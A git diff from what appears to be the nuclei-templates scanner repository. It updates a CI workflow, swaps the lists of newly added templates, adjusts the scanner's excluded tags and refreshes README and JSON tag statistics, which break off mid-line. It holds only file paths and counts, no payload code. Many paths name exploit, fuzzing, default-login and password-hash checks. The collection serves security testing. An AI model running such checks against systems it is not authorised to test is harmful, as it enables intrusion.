diff --git a/.github/workflows/templateman.yml b/.github/workflows/templateman.yml index 13dee6773d..ec09ad7d46 100644 --- a/.github/workflows/templateman.yml +++ b/.github/workflows/templateman.yml @@ -27,7 +27,7 @@ jobs: - name: Run TemplateMan id: tmc run: | - echo /home/runner/work/nuclei-templates/nuclei-templates | tmc -mr -e + echo /home/runner/work/nuclei-templates/nuclei-templates | tmc -mr -e -at git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT - name: Commit files diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index eeb466d5ca..19fa84e93e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,91 +3,83 @@ on: push: paths: - '.new-additions' - - 'dns/soa-detect.yaml' - - 'dns/spf-record-detect.yaml' - - 'dns/txt-service-detect.yaml' - - 'file/keys/dependency/dependency-track.yaml' - - 'file/keys/docker/dockerhub-pat.yaml' - - 'file/keys/doppler/doppler-audit.yaml' - - 'file/keys/doppler/doppler-cli.yaml' - - 'file/keys/doppler/doppler-scim.yaml' - - 'file/keys/doppler/doppler-service-account.yaml' - - 'file/keys/doppler/doppler-service.yaml' - - 'file/keys/dropbox/dropbox-access.yaml' - - 'file/keys/huggingface/huggingface-user-access.yaml' - - 'file/keys/linkedin/linkedin-client.yaml' - - 'file/keys/linkedin/linkedin-secret.yaml' - - 'file/keys/newrelic/newrelic-api-service.yaml' - - 'file/keys/newrelic/newrelic-license-non.yaml' - - 'file/keys/newrelic/newrelic-license.yaml' - - 'file/keys/odbc/odbc-connection.yaml' - - 'file/keys/okta/okta-api.yaml' - - 'file/keys/particle/particle-access.yaml' - - 'file/keys/react/reactapp-password.yaml' - - 'file/keys/react/reactapp-username.yaml' - - 'file/keys/salesforce/salesforce-access.yaml' - - 'file/keys/thingsboard/thingsboard-access.yaml' - - 'file/keys/truenas/truenas-api.yaml' - - 'file/keys/twitter/twitter-client.yaml' - - 'file/keys/twitter/twitter-secret.yaml' - - 'file/keys/wireguard/wireguard-preshared.yaml' - - 'file/keys/wireguard/wireguard-private.yaml' - - 'http/cves/2023/CVE-2023-49785.yaml' - - 'http/cves/2023/CVE-2023-5830.yaml' - - 'http/cves/2023/CVE-2023-5914.yaml' - - 'http/cves/2023/CVE-2023-6114.yaml' - - 'http/cves/2023/CVE-2023-6567.yaml' - - 'http/cves/2024/CVE-2024-1212.yaml' - - 'http/cves/2024/CVE-2024-1698.yaml' - - 'http/cves/2024/CVE-2024-27954.yaml' - - 'http/default-logins/ispconfig-default-login.yaml' - - 'http/exposed-panels/bynder-panel.yaml' - - 'http/exposed-panels/c2/ares-rat-c2.yaml' - - 'http/exposed-panels/c2/caldera-c2.yaml' - - 'http/exposed-panels/c2/hack5-cloud-c2.yaml' - - 'http/exposed-panels/c2/pupyc2.yaml' - - 'http/exposed-panels/c2/supershell-c2.yaml' - - 'http/exposed-panels/cisco/cisco-expressway-panel.yaml' - - 'http/exposed-panels/emqx-panel.yaml' - - 'http/exposed-panels/fortinet/forticlientems-panel.yaml' - - 'http/exposed-panels/fortinet/fortiwlm-panel.yaml' - - 'http/exposed-panels/neocase-hrportal-panel.yaml' - - 'http/exposed-panels/osnexus-panel.yaml' - - 'http/exposed-panels/posteio-admin-panel.yaml' - - 'http/exposed-panels/skeepers-panel.yaml' - - 'http/exposed-panels/softether-vpn-panel.yaml' - - 'http/exposures/files/generic-db.yaml' - - 'http/misconfiguration/installer/posteio-installer.yaml' - - 'http/osint/phishing/kakao-login-phish.yaml' - - 'http/osint/phishing/naver-login-phish.yaml' - - 'http/technologies/directus-detect.yaml' - - 'http/technologies/microsoft/aspnet-version-detect.yaml' - - 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml' - - 'http/technologies/wing-ftp-service-detect.yaml' - - 'http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml' - - 'http/vulnerabilities/idoc/idocview-2word-fileupload.yaml' - - 'http/vulnerabilities/idoc/idocview-lfi.yaml' - - 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml' - - 'http/vulnerabilities/other/office365-indexs-fileread.yaml' - - 'http/vulnerabilities/other/ups-network-lfi.yaml' - - 'javascript/audit/mysql/mysql-load-file.yaml' - - 'javascript/enumeration/mysql/mysql-default-login.yaml' - - 'javascript/enumeration/mysql/mysql-info.yaml' - - 'javascript/enumeration/mysql/mysql-show-databases.yaml' - - 'javascript/enumeration/mysql/mysql-show-variables.yaml' - - 'javascript/enumeration/mysql/mysql-user-enum.yaml' - - 'javascript/enumeration/pop3/pop3-capabilities-enum.yaml' - - 'javascript/enumeration/redis/redis-info.yaml' - - 'javascript/enumeration/redis/redis-require-auth.yaml' - - 'javascript/enumeration/rsync/rsync-version.yaml' - - 'javascript/enumeration/smb/smb-default-creds.yaml' - - 'javascript/enumeration/smb/smb-enum-domains.yaml' - - 'javascript/enumeration/smb/smb-os-detect.yaml' - - 'javascript/enumeration/smb/smb-version-detect.yaml' - - 'javascript/enumeration/smb/smb2-server-time.yaml' - - 'javascript/misconfiguration/mysql/mysql-empty-password.yaml' - - 'network/detection/wing-ftp-detect.yaml' - - 'ssl/c2/venomrat.yaml' + - 'dast/cves/2018/CVE-2018-19518.yaml' + - 'dast/cves/2021/CVE-2021-45046.yaml' + - 'dast/cves/2022/CVE-2022-34265.yaml' + - 'dast/cves/2022/CVE-2022-42889.yaml' + - 'dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml' + - 'dast/vulnerabilities/cmdi/ruby-open-rce.yaml' + - 'dast/vulnerabilities/crlf/cookie-injection.yaml' + - 'dast/vulnerabilities/crlf/crlf-injection.yaml' + - 'dast/vulnerabilities/csti/angular-client-side-template-injection.yaml' + - 'dast/vulnerabilities/lfi/lfi-keyed.yaml' + - 'dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml' + - 'dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml' + - 'dast/vulnerabilities/redirect/open-redirect.yaml' + - 'dast/vulnerabilities/rfi/generic-rfi.yaml' + - 'dast/vulnerabilities/sqli/sqli-error-based.yaml' + - 'dast/vulnerabilities/ssrf/blind-ssrf.yaml' + - 'dast/vulnerabilities/ssrf/response-ssrf.yaml' + - 'dast/vulnerabilities/ssti/reflection-ssti.yaml' + - 'dast/vulnerabilities/xss/dom-xss.yaml' + - 'dast/vulnerabilities/xss/reflected-xss.yaml' + - 'dast/vulnerabilities/xxe/generic-xxe.yaml' + - 'http/cves/2016/CVE-2016-5674.yaml' + - 'http/cves/2018/CVE-2018-10735.yaml' + - 'http/cves/2018/CVE-2018-10736.yaml' + - 'http/cves/2018/CVE-2018-10737.yaml' + - 'http/cves/2018/CVE-2018-10738.yaml' + - 'http/cves/2018/CVE-2018-6605.yaml' + - 'http/cves/2018/CVE-2018-7314.yaml' + - 'http/cves/2019/CVE-2019-9632.yaml' + - 'http/cves/2021/CVE-2021-46418.yaml' + - 'http/cves/2021/CVE-2021-46419.yaml' + - 'http/cves/2022/CVE-2022-29013.yaml' + - 'http/cves/2022/CVE-2022-32430.yaml' + - 'http/cves/2022/CVE-2022-41412.yaml' + - 'http/cves/2023/CVE-2023-0159.yaml' + - 'http/cves/2023/CVE-2023-0678.yaml' + - 'http/cves/2023/CVE-2023-34993.yaml' + - 'http/cves/2023/CVE-2023-47218.yaml' + - 'http/cves/2024/CVE-2024-20767.yaml' + - 'http/cves/2024/CVE-2024-27564.yaml' + - 'http/cves/2024/CVE-2024-28255.yaml' + - 'http/cves/2024/CVE-2024-28734.yaml' + - 'http/cves/2024/CVE-2024-29059.yaml' + - 'http/cves/2024/CVE-2024-29269.yaml' + - 'http/default-logins/3com/3Com-wireless-default-login.yaml' + - 'http/default-logins/3ware-default-login.yaml' + - 'http/default-logins/next-terminal/next-terminal-default-login.yaml' + - 'http/exposed-panels/amprion-gridloss-panel.yaml' + - 'http/exposed-panels/safenet-authentication-panel.yaml' + - 'http/exposed-panels/syfadis-xperience-panel.yaml' + - 'http/exposures/configs/deployment-ini.yaml' + - 'http/miscellaneous/form-detection.yaml' + - 'http/misconfiguration/https-to-http-redirect.yaml' + - 'http/technologies/celebrus-detect.yaml' + - 'http/technologies/privatebin-detect.yaml' + - 'http/technologies/simplesamlphp-detect.yaml' + - 'http/technologies/yourls-detect.yaml' + - 'http/vulnerabilities/dahua/dahua-eims-rce.yaml' + - 'http/vulnerabilities/huatian/huatian-oa-sqli.yaml' + - 'http/vulnerabilities/landray/landray-eis-sqli.yaml' + - 'http/vulnerabilities/other/voyager-lfi.yaml' + - 'javascript/cves/2012/CVE-2012-2122.yaml' + - 'javascript/cves/2019/CVE-2019-9193.yaml' + - 'javascript/enumeration/minecraft-enum.yaml' + - 'javascript/enumeration/pgsql/pgsql-default-db.yaml' + - 'javascript/enumeration/pgsql/pgsql-file-read.yaml' + - 'javascript/enumeration/pgsql/pgsql-list-database.yaml' + - 'javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml' + - 'javascript/enumeration/pgsql/pgsql-list-users.yaml' + - 'javascript/enumeration/pgsql/pgsql-version-detect.yaml' + - 'javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml' + - 'javascript/misconfiguration/pgsql/postgresql-empty-password.yaml' + - 'javascript/udp/detection/tftp-detect.yaml' + - 'network/c2/darkcomet-trojan.yaml' + - 'network/c2/darktrack-rat-trojan.yaml' + - 'network/c2/orcus-rat-trojan.yaml' + - 'network/c2/xtremerat-trojan.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: diff --git a/.new-additions b/.new-additions index 43fae81ba1..2e9b15a1e9 100644 --- a/.new-additions +++ b/.new-additions @@ -1,85 +1,77 @@ -dns/soa-detect.yaml -dns/spf-record-detect.yaml -dns/txt-service-detect.yaml -file/keys/dependency/dependency-track.yaml -file/keys/docker/dockerhub-pat.yaml -file/keys/doppler/doppler-audit.yaml -file/keys/doppler/doppler-cli.yaml -file/keys/doppler/doppler-scim.yaml -file/keys/doppler/doppler-service-account.yaml -file/keys/doppler/doppler-service.yaml -file/keys/dropbox/dropbox-access.yaml -file/keys/huggingface/huggingface-user-access.yaml -file/keys/linkedin/linkedin-client.yaml -file/keys/linkedin/linkedin-secret.yaml -file/keys/newrelic/newrelic-api-service.yaml -file/keys/newrelic/newrelic-license-non.yaml -file/keys/newrelic/newrelic-license.yaml -file/keys/odbc/odbc-connection.yaml -file/keys/okta/okta-api.yaml -file/keys/particle/particle-access.yaml -file/keys/react/reactapp-password.yaml -file/keys/react/reactapp-username.yaml -file/keys/salesforce/salesforce-access.yaml -file/keys/thingsboard/thingsboard-access.yaml -file/keys/truenas/truenas-api.yaml -file/keys/twitter/twitter-client.yaml -file/keys/twitter/twitter-secret.yaml -file/keys/wireguard/wireguard-preshared.yaml -file/keys/wireguard/wireguard-private.yaml -http/cves/2023/CVE-2023-49785.yaml -http/cves/2023/CVE-2023-5830.yaml -http/cves/2023/CVE-2023-5914.yaml -http/cves/2023/CVE-2023-6114.yaml -http/cves/2023/CVE-2023-6567.yaml -http/cves/2024/CVE-2024-1212.yaml -http/cves/2024/CVE-2024-1698.yaml -http/cves/2024/CVE-2024-27954.yaml -http/default-logins/ispconfig-default-login.yaml -http/exposed-panels/bynder-panel.yaml -http/exposed-panels/c2/ares-rat-c2.yaml -http/exposed-panels/c2/caldera-c2.yaml -http/exposed-panels/c2/hack5-cloud-c2.yaml -http/exposed-panels/c2/pupyc2.yaml -http/exposed-panels/c2/supershell-c2.yaml -http/exposed-panels/cisco/cisco-expressway-panel.yaml -http/exposed-panels/emqx-panel.yaml -http/exposed-panels/fortinet/forticlientems-panel.yaml -http/exposed-panels/fortinet/fortiwlm-panel.yaml -http/exposed-panels/neocase-hrportal-panel.yaml -http/exposed-panels/osnexus-panel.yaml -http/exposed-panels/posteio-admin-panel.yaml -http/exposed-panels/skeepers-panel.yaml -http/exposed-panels/softether-vpn-panel.yaml -http/exposures/files/generic-db.yaml -http/misconfiguration/installer/posteio-installer.yaml -http/osint/phishing/kakao-login-phish.yaml -http/osint/phishing/naver-login-phish.yaml -http/technologies/directus-detect.yaml -http/technologies/microsoft/aspnet-version-detect.yaml -http/technologies/microsoft/aspnetmvc-version-disclosure.yaml -http/technologies/wing-ftp-service-detect.yaml -http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml -http/vulnerabilities/idoc/idocview-2word-fileupload.yaml -http/vulnerabilities/idoc/idocview-lfi.yaml -http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml -http/vulnerabilities/other/office365-indexs-fileread.yaml -http/vulnerabilities/other/ups-network-lfi.yaml -javascript/audit/mysql/mysql-load-file.yaml -javascript/enumeration/mysql/mysql-default-login.yaml -javascript/enumeration/mysql/mysql-info.yaml -javascript/enumeration/mysql/mysql-show-databases.yaml -javascript/enumeration/mysql/mysql-show-variables.yaml -javascript/enumeration/mysql/mysql-user-enum.yaml -javascript/enumeration/pop3/pop3-capabilities-enum.yaml -javascript/enumeration/redis/redis-info.yaml -javascript/enumeration/redis/redis-require-auth.yaml -javascript/enumeration/rsync/rsync-version.yaml -javascript/enumeration/smb/smb-default-creds.yaml -javascript/enumeration/smb/smb-enum-domains.yaml -javascript/enumeration/smb/smb-os-detect.yaml -javascript/enumeration/smb/smb-version-detect.yaml -javascript/enumeration/smb/smb2-server-time.yaml -javascript/misconfiguration/mysql/mysql-empty-password.yaml -network/detection/wing-ftp-detect.yaml -ssl/c2/venomrat.yaml +dast/cves/2018/CVE-2018-19518.yaml +dast/cves/2021/CVE-2021-45046.yaml +dast/cves/2022/CVE-2022-34265.yaml +dast/cves/2022/CVE-2022-42889.yaml +dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml +dast/vulnerabilities/cmdi/ruby-open-rce.yaml +dast/vulnerabilities/crlf/cookie-injection.yaml +dast/vulnerabilities/crlf/crlf-injection.yaml +dast/vulnerabilities/csti/angular-client-side-template-injection.yaml +dast/vulnerabilities/lfi/lfi-keyed.yaml +dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml +dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml +dast/vulnerabilities/redirect/open-redirect.yaml +dast/vulnerabilities/rfi/generic-rfi.yaml +dast/vulnerabilities/sqli/sqli-error-based.yaml +dast/vulnerabilities/ssrf/blind-ssrf.yaml +dast/vulnerabilities/ssrf/response-ssrf.yaml +dast/vulnerabilities/ssti/reflection-ssti.yaml +dast/vulnerabilities/xss/dom-xss.yaml +dast/vulnerabilities/xss/reflected-xss.yaml +dast/vulnerabilities/xxe/generic-xxe.yaml +http/cves/2016/CVE-2016-5674.yaml +http/cves/2018/CVE-2018-10735.yaml +http/cves/2018/CVE-2018-10736.yaml +http/cves/2018/CVE-2018-10737.yaml +http/cves/2018/CVE-2018-10738.yaml +http/cves/2018/CVE-2018-6605.yaml +http/cves/2018/CVE-2018-7314.yaml +http/cves/2019/CVE-2019-9632.yaml +http/cves/2021/CVE-2021-46418.yaml +http/cves/2021/CVE-2021-46419.yaml +http/cves/2022/CVE-2022-29013.yaml +http/cves/2022/CVE-2022-32430.yaml +http/cves/2022/CVE-2022-41412.yaml +http/cves/2023/CVE-2023-0159.yaml +http/cves/2023/CVE-2023-0678.yaml +http/cves/2023/CVE-2023-34993.yaml +http/cves/2023/CVE-2023-47218.yaml +http/cves/2024/CVE-2024-20767.yaml +http/cves/2024/CVE-2024-27564.yaml +http/cves/2024/CVE-2024-28255.yaml +http/cves/2024/CVE-2024-28734.yaml +http/cves/2024/CVE-2024-29059.yaml +http/cves/2024/CVE-2024-29269.yaml +http/default-logins/3com/3Com-wireless-default-login.yaml +http/default-logins/3ware-default-login.yaml +http/default-logins/next-terminal/next-terminal-default-login.yaml +http/exposed-panels/amprion-gridloss-panel.yaml +http/exposed-panels/safenet-authentication-panel.yaml +http/exposed-panels/syfadis-xperience-panel.yaml +http/exposures/configs/deployment-ini.yaml +http/miscellaneous/form-detection.yaml +http/misconfiguration/https-to-http-redirect.yaml +http/technologies/celebrus-detect.yaml +http/technologies/privatebin-detect.yaml +http/technologies/simplesamlphp-detect.yaml +http/technologies/yourls-detect.yaml +http/vulnerabilities/dahua/dahua-eims-rce.yaml +http/vulnerabilities/huatian/huatian-oa-sqli.yaml +http/vulnerabilities/landray/landray-eis-sqli.yaml +http/vulnerabilities/other/voyager-lfi.yaml +javascript/cves/2012/CVE-2012-2122.yaml +javascript/cves/2019/CVE-2019-9193.yaml +javascript/enumeration/minecraft-enum.yaml +javascript/enumeration/pgsql/pgsql-default-db.yaml +javascript/enumeration/pgsql/pgsql-file-read.yaml +javascript/enumeration/pgsql/pgsql-list-database.yaml +javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml +javascript/enumeration/pgsql/pgsql-list-users.yaml +javascript/enumeration/pgsql/pgsql-version-detect.yaml +javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml +javascript/misconfiguration/pgsql/postgresql-empty-password.yaml +javascript/udp/detection/tftp-detect.yaml +network/c2/darkcomet-trojan.yaml +network/c2/darktrack-rat-trojan.yaml +network/c2/orcus-rat-trojan.yaml +network/c2/xtremerat-trojan.yaml diff --git a/.nuclei-ignore b/.nuclei-ignore index 1d561717ea..06d5a778e8 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -2,7 +2,7 @@ # ==================================== # # This is default list of tags and files to excluded from default nuclei scan. -# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion +# More details - https://docs.projectdiscovery.io/tools/nuclei/running#template-exclusion # # ============ DO NOT EDIT ============ # Automatically updated by nuclei on execution from nuclei-templates @@ -13,9 +13,9 @@ # unless asked for by the user. tags: - - "fuzz" - "dos" - "local" + - "fuzz" - "bruteforce" # The following templates have been excluded because they have weak matchers and may generate FP results. @@ -34,3 +34,7 @@ files: - http/fuzzing/wordpress-themes-detect.yaml - http/fuzzing/mdb-database-file.yaml - http/fuzzing/iis-shortname.yaml + - dns/soa-detect.yaml + - dns/txt-service-detect.yaml + - javascript/enumeration/pop3/pop3-capabilities-enum.yaml + - javascript/enumeration/redis/redis-require-auth.yaml diff --git a/README.md b/README.md index 26af7e7228..a8749e97ee 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2388 | dhiyaneshdk | 1189 | http | 7229 | info | 3544 | file | 312 | -| panel | 1093 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 | -| wordpress | 954 | dwisiswant0 | 802 | workflows | 191 | medium | 1464 | | | -| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 960 | | | -| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | | -| wp-plugin | 829 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | | -| osint | 791 | pdteam | 285 | javascript | 26 | | | | | -| tech | 661 | ricardomaia | 231 | dns | 18 | | | | | -| lfi | 634 | geeknik | 227 | headless | 11 | | | | | +| cve | 2396 | dhiyaneshdk | 1233 | http | 7267 | info | 3605 | file | 337 | +| panel | 1105 | daffainfo | 864 | file | 337 | high | 1601 | dns | 24 | +| wordpress | 958 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | | +| exposure | 894 | pikpikcu | 353 | network | 133 | critical | 967 | | | +| xss | 893 | pussycat0x | 328 | code | 80 | low | 257 | | | +| wp-plugin | 833 | ritikchaddha | 313 | javascript | 42 | unknown | 35 | | | +| osint | 799 | pdteam | 285 | ssl | 28 | | | | | +| tech | 667 | ricardomaia | 232 | dns | 21 | | | | | +| lfi | 640 | geeknik | 227 | headless | 11 | | | | | | edb | 598 | theamanrawat | 221 | cloud | 9 | | | | | -**571 directories, 8318 files**. +**594 directories, 8406 files**. diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index ecf41df293..5f97387cb7 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2388},{"name":"panel","count":1093},{"name":"wordpress","count":954},{"name":"exposure","count":892},{"name":"xss","count":892},{"name":"wp-plugin","count":829},{"name":"osint","count":791},{"name":"tech","count":661},{"name":"lfi","count":634},{"name":"edb","count":598},{"name":"misconfig","count":593},{"name":"rce","count":571},{"name":"packetstorm","count":518},{"name":"cve2021","count":488},{"name":"wpscan","count":483},{"name":"cve2022","count":469},{"name":"wp","count":406},{"name":"unauth","count":356},{"name":"cve2023","count":338},{"name":"authenticated","count":333},{"name":"sqli","count":327},{"name":"file","count":321},{"name":"intrusive","count":288},{"name":"kev","count":268},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"login","count":225},{"name":"config","count":217},{"name":"top-200","count":215},{"name":"detect","count":214},{"name":"osint-social","count":210},{"name":"oast","count":209},{"name":"default-login","count":199},{"name":"token","count":194},{"name":"","count":191},{"name":"apache","count":178},{"name":"iot","count":166},{"name":"cve2019","count":163},{"name":"cve2018","count":161},{"name":"network","count":157},{"name":"joomla","count":146},{"name":"malware","count":140},{"name":"redirect","count":132},{"name":"keys","count":130},{"name":"auth-bypass","count":123},{"name":"phishing","count":115},{"name":"cve2010","count":112},{"name":"ssrf","count":111},{"name":"files","count":111},{"name":"cve2017","count":110},{"name":"cms","count":107},{"name":"router","count":107},{"name":"install","count":103},{"name":"top-100","count":100},{"name":"devops","count":87},{"name":"disclosure","count":87},{"name":"linux","count":82},{"name":"code","count":80},{"name":"privesc","count":79},{"name":"local","count":79},{"name":"tokens","count":78},{"name":"seclists","count":76},{"name":"takeover","count":74},{"name":"fileupload","count":71},{"name":"oracle","count":70},{"name":"oss","count":67},{"name":"cisco","count":64},{"name":"adobe","count":61},{"name":"huntr","count":59},{"name":"cve2015","count":58},{"name":"cve2016","count":56},{"name":"google","count":56},{"name":"atlassian","count":56},{"name":"vmware","count":54},{"name":"ir","count":50},{"name":"logs","count":49},{"name":"tenable","count":47},{"name":"log4j","count":46},{"name":"debug","count":45},{"name":"hackerone","count":45},{"name":"osint-gaming","count":45},{"name":"aem","count":45},{"name":"c2","count":44},{"name":"cve2014","count":44},{"name":"aws","count":44},{"name":"jndi","count":44},{"name":"vulhub","count":44},{"name":"cloud","count":43},{"name":"osint-hobby","count":42},{"name":"osint-porn","count":42},{"name":"deserialization","count":42},{"name":"plugin","count":42},{"name":"generic","count":42},{"name":"traversal","count":42},{"name":"oa","count":41},{"name":"springboot","count":41},{"name":"php","count":41},{"name":"enum","count":41},{"name":"cnvd","count":39},{"name":"misc","count":38},{"name":"microsoft","count":37},{"name":"listing","count":37},{"name":"jira","count":37},{"name":"kubernetes","count":37},{"name":"injection","count":36},{"name":"ibm","count":35},{"name":"osint-misc","count":35},{"name":"bruteforce","count":35},{"name":"sap","count":32},{"name":"miscellaneous","count":32},{"name":"js","count":32},{"name":"cti","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"tls","count":28},{"name":"wp-theme","count":28},{"name":"k8s","count":28},{"name":"gitlab","count":28},{"name":"dlink","count":27},{"name":"api","count":27},{"name":"bestwebsoft","count":27},{"name":"amazon","count":27},{"name":"ssl","count":27},{"name":"ssh","count":26},{"name":"cve2024","count":26},{"name":"manageengine","count":25},{"name":"weaver","count":25},{"name":"cve2012","count":25},{"name":"firewall","count":25},{"name":"proxy","count":25},{"name":"osint-business","count":24},{"name":"osint-images","count":24},{"name":"osint-finance","count":24},{"name":"admin","count":24},{"name":"fortinet","count":24},{"name":"osint-shopping","count":24},{"name":"zoho","count":24},{"name":"tomcat","count":23},{"name":"lfr","count":23},{"name":"stored-xss","count":23},{"name":"yonyou","count":23},{"name":"file-upload","count":22},{"name":"xxe","count":22},{"name":"cicd","count":22},{"name":"audit","count":22},{"name":"github","count":21},{"name":"ecology","count":21},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"printer","count":21},{"name":"dns","count":20},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"citrix","count":20},{"name":"rukovoditel","count":19},{"name":"hp","count":19},{"name":"struts","count":19},{"name":"wavlink","count":19},{"name":"grafana","count":19},{"name":"cve2011","count":18},{"name":"prestashop","count":18},{"name":"coldfusion","count":18},{"name":"osint-music","count":18},{"name":"ruijie","count":18},{"name":"android","count":18},{"name":"nginx","count":17},{"name":"service","count":17},{"name":"ftp","count":17},{"name":"azure","count":17},{"name":"confluence","count":17},{"name":"node.js","count":17},{"name":"backup","count":16},{"name":"cve2009","count":16},{"name":"rconfig","count":16},{"name":"microweber","count":16},{"name":"alibaba","count":16},{"name":"status","count":16},{"name":"jarm","count":16},{"name":"osint-blog","count":16},{"name":"mail","count":16},{"name":"honeypot","count":16},{"name":"magento","count":15},{"name":"zyxel","count":15},{"name":"seeyon","count":15},{"name":"java","count":15},{"name":"cnvd2021","count":15},{"name":"nodejs","count":15},{"name":"cve2013","count":15},{"name":"cve2008","count":15},{"name":"woocommerce","count":15},{"name":"tongda","count":15},{"name":"bypass","count":15},{"name":"backdoor","count":14},{"name":"osint-health","count":14},{"name":"domainmod","count":14},{"name":"vpn","count":14},{"name":"node","count":14},{"name":"osint-art","count":14},{"name":"ruby","count":14},{"name":"icewarp","count":14},{"name":"jboss","count":14},{"name":"creds-stuffing","count":14},{"name":"dell","count":14},{"name":"zohocorp","count":14},{"name":"login-check","count":14},{"name":"auth","count":14},{"name":"npm","count":14},{"name":"smtp","count":14},{"name":"dashboard","count":14},{"name":"git","count":13},{"name":"cuppa","count":13},{"name":"laravel","count":13},{"name":"graphql","count":13},{"name":"windows","count":13},{"name":"rails","count":13},{"name":"abstractapi","count":13},{"name":"netgear","count":13},{"name":"docker","count":13},{"name":"sonicwall","count":13},{"name":"fortigate","count":13},{"name":"osint-political","count":13},{"name":"osint-dating","count":13},{"name":"airflow","count":13},{"name":"cuppacms","count":13},{"name":"setup","count":13},{"name":"ivanti","count":12},{"name":"ssti","count":12},{"name":"ofbiz","count":12},{"name":"zimbra","count":12},{"name":"headless","count":12},{"name":"kafka","count":12},{"name":"drupal","count":12},{"name":"netsweeper","count":12},{"name":"redis","count":12},{"name":"webserver","count":12},{"name":"moosocial","count":12},{"name":"jolokia","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"phpgurukul","count":11},{"name":"spring","count":11},{"name":"osint-video","count":11},{"name":"jetbrains","count":11},{"name":"online-fire-reporting","count":11},{"name":"xstream","count":11},{"name":"fastjson","count":11},{"name":"phpmyadmin","count":11},{"name":"vbulletin","count":11},{"name":"db","count":10},{"name":"solarview","count":10},{"name":"dedecms","count":10},{"name":"iis","count":10},{"name":"elasticsearch","count":10},{"name":"django","count":10},{"name":"thinkphp","count":10},{"name":"glpi","count":10},{"name":"xstream_project","count":10},{"name":"solr","count":10},{"name":"zabbix","count":10},{"name":"hikvision","count":10},{"name":"cache","count":10},{"name":"prometheus","count":10},{"name":"digitalocean","count":10},{"name":"sitecore","count":10},{"name":"installer","count":10},{"name":"nagios","count":10},{"name":"symfony","count":10},{"name":"kube","count":9},{"name":"lucee","count":9},{"name":"scada","count":9},{"name":"bitbucket","count":9},{"name":"moodle","count":9},{"name":"facebook","count":9},{"name":"pfsense","count":9},{"name":"cnvd2020","count":9},{"name":"sangfor","count":9},{"name":"versa","count":9},{"name":"artica","count":9},{"name":"info-leak","count":9},{"name":"vcenter","count":9},{"name":"opencats","count":9},{"name":"druid","count":9},{"name":"python","count":9},{"name":"firebase","count":9},{"name":"dropbox","count":9},{"name":"secret","count":9},{"name":"exchange","count":9},{"name":"gitea","count":9},{"name":"wso2","count":9},{"name":"smb","count":9},{"name":"newrelic","count":9},{"name":"hashicorp","count":9},{"name":"samsung","count":8},{"name":"mlflow","count":8},{"name":"hms","count":8},{"name":"mirai","count":8},{"name":"crlf","count":8},{"name":"symantec","count":8},{"name":"ognl","count":8},{"name":"huawei","count":8},{"name":"oauth","count":8},{"name":"console","count":8},{"name":"instrusive","count":8},{"name":"elastic","count":8},{"name":"cloud-enum","count":8},{"name":"discord","count":8},{"name":"osint-news","count":8},{"name":"emerge","count":8},{"name":"phpjabbers","count":8},{"name":"sophos","count":8},{"name":"spotweb","count":8},{"name":"wanhu","count":8},{"name":"unauthenticated","count":8},{"name":"atom","count":8},{"name":"e-office","count":8},{"name":"phpinfo","count":8},{"name":"recon","count":8},{"name":"metadata","count":8},{"name":"bucket","count":8},{"name":"cisco-switch","count":8},{"name":"config-audit","count":8},{"name":"default-page","count":8},{"name":"go","count":8},{"name":"dahua","count":8},{"name":"manager","count":8},{"name":"fpd","count":7},{"name":"ec2","count":7},{"name":"opensis","count":7},{"name":"solarwinds","count":7},{"name":"gogs","count":7},{"name":"bigip","count":7},{"name":"fortios","count":7},{"name":"nexus","count":7},{"name":"fuzzing","count":7},{"name":"websphere","count":7},{"name":"avtech","count":7},{"name":"odoo","count":7},{"name":"vms","count":7},{"name":"shopify","count":7},{"name":"joomla\\!","count":7},{"name":"maps","count":7},{"name":"cacti","count":7},{"name":"bloofox","count":7},{"name":"moodating","count":7},{"name":"monstra","count":7},{"name":"blockchain","count":7},{"name":"mobileiron","count":7},{"name":"filemanager","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"slack","count":7},{"name":"keking","count":7},{"name":"nacos","count":7},{"name":"exploitdb","count":7},{"name":"nagiosxi","count":7},{"name":"ruckus","count":7},{"name":"activemq","count":7},{"name":"blind","count":7},{"name":"pmb","count":7},{"name":"doppler","count":7},{"name":"squirrelmail","count":7},{"name":"error","count":7},{"name":"spotweb_project","count":7},{"name":"redhat","count":7},{"name":"mysql","count":6},{"name":"rfi","count":6},{"name":"s3","count":6},{"name":"liferay","count":6},{"name":"74c